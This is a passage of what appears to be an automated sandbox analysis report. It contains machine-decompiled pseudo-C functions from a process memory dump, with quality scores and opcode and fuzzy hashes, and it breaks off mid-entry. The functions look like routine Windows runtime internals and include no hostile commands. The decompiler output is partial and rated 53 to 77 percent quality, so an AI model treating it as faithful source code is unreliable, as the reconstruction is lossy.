                                          				intOrPtr _v40;
                                          				signed int* _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				signed int* _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				char* _v76;
                                          				intOrPtr _v80;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				intOrPtr _v96;
                                          				intOrPtr _v100;
                                          				intOrPtr _v104;
                                          				signed int* _v108;
                                          				char _v140;
                                          				signed int _v144;
                                          				signed int _v148;
                                          				intOrPtr _v152;
                                          				char _v156;
                                          				intOrPtr _v160;
                                          				char _v164;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t67;
                                          				intOrPtr _t70;
                                          				void* _t71;
                                          				void* _t72;
                                          				signed int _t73;
                                          
                                          				_t69 = __edx;
                                          				_v8 =  *0x100d360 ^ _t73;
                                          				_t48 =  *[fs:0x30];
                                          				_t72 = __edx;
                                          				_t71 = __ecx;
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                          					_t48 = E00F44E70(0x10086e4, 0xf59490, 0, 0);
                                          					if( *0x10053e8 > 5 && E00F58F33(0x10053e8, 0, 0x2000) != 0) {
                                          						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                          						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                          						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                          						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                          						_v108 =  &_v84;
                                          						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                          						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                          						_v76 =  &_v156;
                                          						_t70 = 8;
                                          						_v60 =  &_v144;
                                          						_t67 = 4;
                                          						_v44 =  &_v148;
                                          						_v152 = 0;
                                          						_v160 = 0;
                                          						_v104 = 0;
                                          						_v100 = 2;
                                          						_v96 = 0;
                                          						_v88 = 0;
                                          						_v80 = 0;
                                          						_v72 = 0;
                                          						_v68 = _t70;
                                          						_v64 = 0;
                                          						_v56 = 0;
                                          						_v52 = 0x10053e8;
                                          						_v48 = 0;
                                          						_v40 = 0;
                                          						_v36 = 0x10053e8;
                                          						_v32 = 0;
                                          						_v28 =  &_v164;
                                          						_v24 = 0;
                                          						_v20 = _t70;
                                          						_v16 = 0;
                                          						_t69 = 0xefbc46;
                                          						_t48 = E00F97B9C(0x10053e8, 0xefbc46, _t67, 0x10053e8, _t70,  &_v140);
                                          					}
                                          				}
                                          				return E00F5B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                          			}












































                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9d77e4cc35e040233fe52dfc30be46633aeb3d90f2b294988b353dd0afc6661e
                                          • Instruction ID: 8970dbc29e48e5cc78fbbe7d9766a1d2c68ae0ef3e7024a104af572118079ffa
                                          • Opcode Fuzzy Hash: 9d77e4cc35e040233fe52dfc30be46633aeb3d90f2b294988b353dd0afc6661e
                                          • Instruction Fuzzy Hash: B54190B1D003189FDB24CFAAD981AADFBF4FB48710F5081AEE549A7240EB745A85DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00F54A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				signed int* _v12;
                                          				char _v13;
                                          				signed int _v16;
                                          				char _v21;
                                          				signed int* _v24;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t29;
                                          				signed int* _t32;
                                          				signed int* _t41;
                                          				signed int _t42;
                                          				void* _t43;
                                          				intOrPtr* _t51;
                                          				void* _t52;
                                          				signed int _t53;
                                          				signed int _t58;
                                          				void* _t59;
                                          				signed int _t60;
                                          				signed int _t62;
                                          
                                          				_t49 = __edx;
                                          				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                          				_t26 =  *0x100d360 ^ _t62;
                                          				_v8 =  *0x100d360 ^ _t62;
                                          				_t41 = __ecx;
                                          				_t51 = __edx;
                                          				_v12 = __ecx;
                                          				if(_a4 == 0) {
                                          					if(_a8 != 0) {
                                          						goto L1;
                                          					}
                                          					_v13 = 1;
                                          					E00F32280(_t26, 0x1008608);
                                          					_t58 =  *_t41;
                                          					if(_t58 == 0) {
                                          						L11:
                                          						E00F2FFB0(_t41, _t51, 0x1008608);
                                          						L2:
                                          						 *0x100b1e0(_a4, _a8);
                                          						_t42 =  *_t51();
                                          						if(_t42 == 0) {
                                          							_t29 = 0;
                                          							L5:
                                          							_pop(_t52);
                                          							_pop(_t59);
                                          							_pop(_t43);
                                          							return E00F5B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                          						}
                                          						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                          						if(_v21 != 0) {
                                          							_t53 = 0;
                                          							E00F32280(_t28, 0x1008608);
                                          							_t32 = _v24;
                                          							if( *_t32 == _t58) {
                                          								 *_t32 = _t42;
                                          								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                          								if(_t58 != 0) {
                                          									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                          									asm("sbb edi, edi");
                                          									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                          								}
                                          							}
                                          							E00F2FFB0(_t42, _t53, 0x1008608);
                                          							if(_t53 != 0) {
                                          								L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                          							}
                                          						}
                                          						_t29 = _t42;
                                          						goto L5;
                                          					}
                                          					if( *((char*)(_t58 + 0x40)) != 0) {
                                          						L10:
                                          						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                          						E00F2FFB0(_t41, _t51, 0x1008608);
                                          						_t29 = _t58;
                                          						goto L5;
                                          					}
                                          					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                          					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                          						goto L11;
                                          					}
                                          					goto L10;
                                          				}
                                          				L1:
                                          				_v13 = 0;
                                          				_t58 = 0;
                                          				goto L2;
                                          			}

























                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e46515171dd1262a9ed90b95d56183a0b6769ab44315cbc6ad8ddb121fc4cd5
                                          • Instruction ID: 3725904081df9ce9e224d414647a1f905ea27f474bf20e03f6f3e619721fc961
                                          • Opcode Fuzzy Hash: 7e46515171dd1262a9ed90b95d56183a0b6769ab44315cbc6ad8ddb121fc4cd5
                                          • Instruction Fuzzy Hash: 1D313232A413509BC762AF14CD41B2BBBA4FFC5B29F114529FE564B241C778EC88EB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 74%
                                          			E00F4E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                          				intOrPtr* _v0;
                                          				signed char _v4;
                                          				signed int _v8;
                                          				void* __ecx;
                                          				void* __ebp;
                                          				void* _t37;
                                          				intOrPtr _t38;
                                          				signed int _t44;
                                          				signed char _t52;
                                          				void* _t54;
                                          				intOrPtr* _t56;
                                          				void* _t58;
                                          				char* _t59;
                                          				signed int _t62;
                                          
                                          				_t58 = __edx;
                                          				_push(0);
                                          				_push(4);
                                          				_push( &_v8);
                                          				_push(0x24);
                                          				_push(0xffffffff);
                                          				if(E00F59670() < 0) {
                                          					L00F6DF30(_t54, _t58, _t35);
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					_push(_t54);
                                          					_t52 = _v4;
                                          					if(_t52 > 8) {
                                          						_t37 = 0xc0000078;
                                          					} else {
                                          						_t38 =  *0x1007b9c; // 0x0
                                          						_t62 = _t52 & 0x000000ff;
                                          						_t59 = L00F34620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                          						if(_t59 == 0) {
                                          							_t37 = 0xc0000017;
                                          						} else {
                                          							_t56 = _v0;
                                          							 *(_t59 + 1) = _t52;
                                          							 *_t59 = 1;
                                          							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                          							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                          							_t44 = _t62 - 1;
                                          							if(_t44 <= 7) {
                                          								switch( *((intOrPtr*)(_t44 * 4 +  &M00F4E810))) {
                                          									case 0:
                                          										L6:
                                          										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                          										goto L7;
                                          									case 1:
                                          										L13:
                                          										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                          										goto L6;
                                          									case 2:
                                          										L12:
                                          										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                          										goto L13;
                                          									case 3:
                                          										L11:
                                          										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                          										goto L12;
                                          									case 4:
                                          										L10:
                                          										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                          										goto L11;
                                          									case 5:
                                          										L9:
                                          										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                          										goto L10;
                                          									case 6:
                                          										L17:
                                          										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                          										goto L9;
                                          									case 7:
                                          										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                          										goto L17;
                                          								}
                                          							}
                                          							L7:
                                          							 *_a40 = _t59;
                                          							_t37 = 0;
                                          						}
                                          					}
                                          					return _t37;
                                          				} else {
                                          					_push(0x20);
                                          					asm("ror eax, cl");
                                          					return _a4 ^ _v8;
                                          				}
                                          			}


















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c6da2c49c718734c3d6deb7c4a212b3e4b412067cadfe476bf650f9574198a3e
                                          • Instruction ID: ca31999c09d3fd95e025b90c424616d39893159c49ec4bfd490d55890f16088d
                                          • Opcode Fuzzy Hash: c6da2c49c718734c3d6deb7c4a212b3e4b412067cadfe476bf650f9574198a3e
                                          • Instruction Fuzzy Hash: 8C315C75A14249AFD744CF68D841F9ABBE4FB09324F148256FD14CB341D675ED80DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E00F4BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				intOrPtr _t22;
                                          				intOrPtr* _t41;
                                          				intOrPtr _t51;
                                          
                                          				_t51 =  *0x1006100; // 0x5
                                          				_v12 = __edx;
                                          				_v8 = __ecx;
                                          				if(_t51 >= 0x800) {
                                          					L12:
                                          					return 0;
                                          				} else {
                                          					goto L1;
                                          				}
                                          				while(1) {
                                          					L1:
                                          					_t22 = _t51;
                                          					asm("lock cmpxchg [ecx], edx");
                                          					if(_t51 == _t22) {
                                          						break;
                                          					}
                                          					_t51 = _t22;
                                          					if(_t22 < 0x800) {
                                          						continue;
                                          					}
                                          					goto L12;
                                          				}
                                          				E00F32280(0xd, 0x501f1a0);
                                          				_t41 =  *0x10060f8; // 0x0
                                          				if(_t41 != 0) {
                                          					 *0x10060f8 =  *_t41;
                                          					 *0x10060fc =  *0x10060fc + 0xffff;
                                          				}
                                          				E00F2FFB0(_t41, 0x800, 0x501f1a0);
                                          				if(_t41 != 0) {
                                          					L6:
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					asm("movsd");
                                          					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                          					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                          					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                          					do {
                                          						asm("lock xadd [0x10060f0], ax");
                                          						 *((short*)(_t41 + 0x34)) = 1;
                                          					} while (1 == 0);
                                          					goto L8;
                                          				} else {
                                          					_t41 = L00F34620(0x1006100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                          					if(_t41 == 0) {
                                          						L11:
                                          						asm("lock dec dword [0x1006100]");
                                          						L8:
                                          						return _t41;
                                          					}
                                          					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                          					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                          					if(_t41 == 0) {
                                          						goto L11;
                                          					}
                                          					goto L6;
                                          				}
                                          			}











                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b2841bc4aaac76a7b8694a69f78c3e9421088c1ad0cc09af0270584718b954cb
                                          • Instruction ID: 140b36c70c1f537dd92841fd936104875160d2af6a9c61bd1e3028d90a446e0c
                                          • Opcode Fuzzy Hash: b2841bc4aaac76a7b8694a69f78c3e9421088c1ad0cc09af0270584718b954cb
                                          • Instruction Fuzzy Hash: E731F236A006159BDB22DF58D8C07A677B5FF18321F1440B9ED84DB206E77ADD45EB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 60%
                                          			E00F41DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr* _v20;
                                          				void* _t22;
                                          				char _t23;
                                          				void* _t36;
                                          				intOrPtr _t42;
                                          				intOrPtr _t43;
                                          
                                          				_v12 = __ecx;
                                          				_t43 = 0;
                                          				_v20 = __edx;
                                          				_t42 =  *__edx;
                                          				 *__edx = 0;
                                          				_v16 = _t42;
                                          				_push( &_v8);
                                          				_push(0);
                                          				_push(0);
                                          				_push(6);
                                          				_push(0);
                                          				_push(__ecx);
                                          				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                          				_push(_t36);
                                          				_t22 = E00F3F460();
                                          				if(_t22 < 0) {
                                          					if(_t22 == 0xc0000023) {
                                          						goto L1;
                                          					}
                                          					L3:
                                          					return _t43;
                                          				}
                                          				L1:
                                          				_t23 = _v8;
                                          				if(_t23 != 0) {
                                          					_t38 = _a4;
                                          					if(_t23 >  *_a4) {
                                          						_t42 = L00F34620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                          						if(_t42 == 0) {
                                          							goto L3;
                                          						}
                                          						_t23 = _v8;
                                          					}
                                          					_push( &_v8);
                                          					_push(_t23);
                                          					_push(_t42);
                                          					_push(6);
                                          					_push(_t43);
                                          					_push(_v12);
                                          					_push(_t36);
                                          					if(E00F3F460() < 0) {
                                          						if(_t42 != 0 && _t42 != _v16) {
                                          							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                          						}
                                          						goto L3;
                                          					}
                                          					 *_v20 = _t42;
                                          					 *_a4 = _v8;
                                          				}
                                          				_t43 = 1;
                                          				goto L3;
                                          			}













                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction ID: 21c117a70d41fa8ecb8204f1caa4df301d9eb29a55afb94dc3e816c72bfa1e96
                                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                          • Instruction Fuzzy Hash: 9A216D76A00529ABD721DF59CC80EABBFB9FF85750F114055ED0597210D634AE41E7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E00F19100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                          				signed int _t53;
                                          				signed int _t56;
                                          				signed int* _t60;
                                          				signed int _t63;
                                          				signed int _t66;
                                          				signed int _t69;
                                          				void* _t70;
                                          				intOrPtr* _t72;
                                          				void* _t78;
                                          				void* _t79;
                                          				signed int _t80;
                                          				intOrPtr _t82;
                                          				void* _t85;
                                          				void* _t88;
                                          				void* _t89;
                                          
                                          				_t84 = __esi;
                                          				_t70 = __ecx;
                                          				_t68 = __ebx;
                                          				_push(0x2c);
                                          				_push(0xfef6e8);
                                          				E00F6D0E8(__ebx, __edi, __esi);
                                          				 *((char*)(_t85 - 0x1d)) = 0;
                                          				_t82 =  *((intOrPtr*)(_t85 + 8));
                                          				if(_t82 == 0) {
                                          					L4:
                                          					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                          						E00FE88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                          					}
                                          					L5:
                                          					return E00F6D130(_t68, _t82, _t84);
                                          				}
                                          				_t88 = _t82 -  *0x10086c0; // 0xaa07b0
                                          				if(_t88 == 0) {
                                          					goto L4;
                                          				}
                                          				_t89 = _t82 -  *0x10086b8; // 0x0
                                          				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                          					goto L4;
                                          				} else {
                                          					E00F32280(_t82 + 0xe0, _t82 + 0xe0);
                                          					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                          					__eflags =  *((char*)(_t82 + 0xe5));
                                          					if(__eflags != 0) {
                                          						E00FE88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                          						goto L12;
                                          					} else {
                                          						__eflags =  *((char*)(_t82 + 0xe4));
                                          						if( *((char*)(_t82 + 0xe4)) == 0) {
                                          							 *((char*)(_t82 + 0xe4)) = 1;
                                          							_push(_t82);
                                          							_push( *((intOrPtr*)(_t82 + 0x24)));
                                          							E00F5AFD0();
                                          						}
                                          						while(1) {
                                          							_t60 = _t82 + 8;
                                          							 *(_t85 - 0x2c) = _t60;
                                          							_t68 =  *_t60;
                                          							_t80 = _t60[1];
                                          							 *(_t85 - 0x28) = _t68;
                                          							 *(_t85 - 0x24) = _t80;
                                          							while(1) {
                                          								L10:
                                          								__eflags = _t80;
                                          								if(_t80 == 0) {
                                          									break;
                                          								}
                                          								_t84 = _t68;
                                          								 *(_t85 - 0x30) = _t80;
                                          								 *(_t85 - 0x24) = _t80 - 1;
                                          								asm("lock cmpxchg8b [edi]");
                                          								_t68 = _t84;
                                          								 *(_t85 - 0x28) = _t68;
                                          								 *(_t85 - 0x24) = _t80;
                                          								__eflags = _t68 - _t84;
                                          								_t82 =  *((intOrPtr*)(_t85 + 8));
                                          								if(_t68 != _t84) {
                                          									continue;
                                          								}
                                          								__eflags = _t80 -  *(_t85 - 0x30);
                                          								if(_t80 !=  *(_t85 - 0x30)) {
                                          									continue;
                                          								}
                                          								__eflags = _t80;
                                          								if(_t80 == 0) {
                                          									break;
                                          								}
                                          								_t63 = 0;
                                          								 *(_t85 - 0x34) = 0;
                                          								_t84 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									 *(_t85 - 0x3c) = _t84;
                                          									__eflags = _t84 - 3;
                                          									if(_t84 >= 3) {
                                          										break;
                                          									}
                                          									__eflags = _t63;
                                          									if(_t63 != 0) {
                                          										L40:
                                          										_t84 =  *_t63;
                                          										__eflags = _t84;
                                          										if(_t84 != 0) {
                                          											_t84 =  *(_t84 + 4);
                                          											__eflags = _t84;
                                          											if(_t84 != 0) {
                                          												 *0x100b1e0(_t63, _t82);
                                          												 *_t84();
                                          											}
                                          										}
                                          										do {
                                          											_t60 = _t82 + 8;
                                          											 *(_t85 - 0x2c) = _t60;
                                          											_t68 =  *_t60;
                                          											_t80 = _t60[1];
                                          											 *(_t85 - 0x28) = _t68;
                                          											 *(_t85 - 0x24) = _t80;
                                          											goto L10;
                                          										} while (_t63 == 0);
                                          										goto L40;
                                          									}
                                          									_t69 = 0;
                                          									__eflags = 0;
                                          									while(1) {
                                          										 *(_t85 - 0x38) = _t69;
                                          										__eflags = _t69 -  *0x10084c0;
                                          										if(_t69 >=  *0x10084c0) {
                                          											break;
                                          										}
                                          										__eflags = _t63;
                                          										if(_t63 != 0) {
                                          											break;
                                          										}
                                          										_t66 = E00FE9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                          										__eflags = _t66;
                                          										if(_t66 == 0) {
                                          											_t63 = 0;
                                          											__eflags = 0;
                                          										} else {
                                          											_t63 = _t66 + 0xfffffff4;
                                          										}
                                          										 *(_t85 - 0x34) = _t63;
                                          										_t69 = _t69 + 1;
                                          									}
                                          									_t84 = _t84 + 1;
                                          								}
                                          								__eflags = _t63;
                                          							}
                                          							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                          							 *((char*)(_t82 + 0xe5)) = 1;
                                          							 *((char*)(_t85 - 0x1d)) = 1;
                                          							L12:
                                          							 *(_t85 - 4) = 0xfffffffe;
                                          							E00F1922A(_t82);
                                          							_t53 = E00F37D50();
                                          							__eflags = _t53;
                                          							if(_t53 != 0) {
                                          								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          							} else {
                                          								_t56 = 0x7ffe0386;
                                          							}
                                          							__eflags =  *_t56;
                                          							if( *_t56 != 0) {
                                          								_t56 = E00FE8B58(_t82);
                                          							}
                                          							__eflags =  *((char*)(_t85 - 0x1d));
                                          							if( *((char*)(_t85 - 0x1d)) != 0) {
                                          								__eflags = _t82 -  *0x10086c0; // 0xaa07b0
                                          								if(__eflags != 0) {
                                          									__eflags = _t82 -  *0x10086b8; // 0x0
                                          									if(__eflags == 0) {
                                          										_t79 = 0x10086bc;
                                          										_t72 = 0x10086b8;
                                          										goto L18;
                                          									}
                                          									__eflags = _t56 | 0xffffffff;
                                          									asm("lock xadd [edi], eax");
                                          									if(__eflags == 0) {
                                          										E00F19240(_t68, _t82, _t82, _t84, __eflags);
                                          									}
                                          								} else {
                                          									_t79 = 0x10086c4;
                                          									_t72 = 0x10086c0;
                                          									L18:
                                          									E00F49B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                          								}
                                          							}
                                          							goto L5;
                                          						}
                                          					}
                                          				}
                                          			}


















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ca232c97da99669edccbd7f006ed27df1e57e88cb07cf54c7dd59f411711614b
                                          • Instruction ID: 0c5b514350409901730cf755adc2f79fdd79be3984879ea63d5ec3944fc39930
                                          • Opcode Fuzzy Hash: ca232c97da99669edccbd7f006ed27df1e57e88cb07cf54c7dd59f411711614b
                                          • Instruction Fuzzy Hash: 7F31C571E09286EFDB25DB68C8587ECB7B1BB48320F15815AD40477241C3B5AEC0EB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E00F30050(void* __ecx) {
                                          				signed int _v8;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr* _t30;
                                          				intOrPtr* _t31;
                                          				signed int _t34;
                                          				void* _t40;
                                          				void* _t41;
                                          				signed int _t44;
                                          				intOrPtr _t47;
                                          				signed int _t58;
                                          				void* _t59;
                                          				void* _t61;
                                          				void* _t62;
                                          				signed int _t64;
                                          
                                          				_push(__ecx);
                                          				_v8 =  *0x100d360 ^ _t64;
                                          				_t61 = __ecx;
                                          				_t2 = _t61 + 0x20; // 0x20
                                          				E00F49ED0(_t2, 1, 0);
                                          				_t52 =  *(_t61 + 0x8c);
                                          				_t4 = _t61 + 0x8c; // 0x8c
                                          				_t40 = _t4;
                                          				do {
                                          					_t44 = _t52;
                                          					_t58 = _t52 & 0x00000001;
                                          					_t24 = _t44;
                                          					asm("lock cmpxchg [ebx], edx");
                                          					_t52 = _t44;
                                          				} while (_t52 != _t44);
                                          				if(_t58 == 0) {
                                          					L7:
                                          					_pop(_t59);
                                          					_pop(_t62);
                                          					_pop(_t41);
                                          					return E00F5B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                          				}
                                          				asm("lock xadd [esi], eax");
                                          				_t47 =  *[fs:0x18];
                                          				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                          				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                          				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                          				if(_t30 != 0) {
                                          					if( *_t30 == 0) {
                                          						goto L4;
                                          					}
                                          					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          					L5:
                                          					if( *_t31 != 0) {
                                          						_t18 = _t61 + 0x78; // 0x78
                                          						E00FE8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                          					}
                                          					_t52 =  *(_t61 + 0x5c);
                                          					_t11 = _t61 + 0x78; // 0x78
                                          					_t34 = E00F49702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                          					_t24 = _t34 | 0xffffffff;
                                          					asm("lock xadd [esi], eax");
                                          					if((_t34 | 0xffffffff) == 0) {
                                          						 *0x100b1e0(_t61);
                                          						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                          					}
                                          					goto L7;
                                          				}
                                          				L4:
                                          				_t31 = 0x7ffe0386;
                                          				goto L5;
                                          			}




















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82ac9048bfb5cc7fad2498781eb19f6902b93fcdee5cd37d145ddb58fa4b33f6
                                          • Instruction ID: f8b3f28a09a01cf2e7fc21985fa43bb9c50842b730d2b7d68bd0146ee3398b4d
                                          • Opcode Fuzzy Hash: 82ac9048bfb5cc7fad2498781eb19f6902b93fcdee5cd37d145ddb58fa4b33f6
                                          • Instruction Fuzzy Hash: D131BF71601B04CFD725CF28C850B96B3E5FF88724F14856EE49A87650DB75AC01EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 77%
                                          			E00F96C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                          				signed short* _v8;
                                          				signed char _v12;
                                          				void* _t22;
                                          				signed char* _t23;
                                          				intOrPtr _t24;
                                          				signed short* _t44;
                                          				void* _t47;
                                          				signed char* _t56;
                                          				signed char* _t58;
                                          
                                          				_t48 = __ecx;
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t44 = __ecx;
                                          				_v12 = __edx;
                                          				_v8 = __ecx;
                                          				_t22 = E00F37D50();
                                          				_t58 = 0x7ffe0384;
                                          				if(_t22 == 0) {
                                          					_t23 = 0x7ffe0384;
                                          				} else {
                                          					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          				}
                                          				if( *_t23 != 0) {
                                          					_t24 =  *0x1007b9c; // 0x0
                                          					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                          					_t23 = L00F34620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                          					_t56 = _t23;
                                          					if(_t56 != 0) {
                                          						_t56[0x24] = _a4;
                                          						_t56[0x28] = _a8;
                                          						_t56[6] = 0x1420;
                                          						_t56[0x20] = _v12;
                                          						_t14 =  &(_t56[0x2c]); // 0x2c
                                          						E00F5F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                          						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                          						if(E00F37D50() != 0) {
                                          							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          						}
                                          						_push(_t56);
                                          						_push(_t47 - 0x20);
                                          						_push(0x402);
                                          						_push( *_t58 & 0x000000ff);
                                          						E00F59AE0();
                                          						_t23 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                          					}
                                          				}
                                          				return _t23;
                                          			}












                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d6999b08102d68666945d315ba49a31bd1cba5573b9266823c6682364f1be351
                                          • Instruction ID: 5a09a6607ca5e56f0a4cf4323bd3c23758fd9063456c52a36113e86f24b335bc
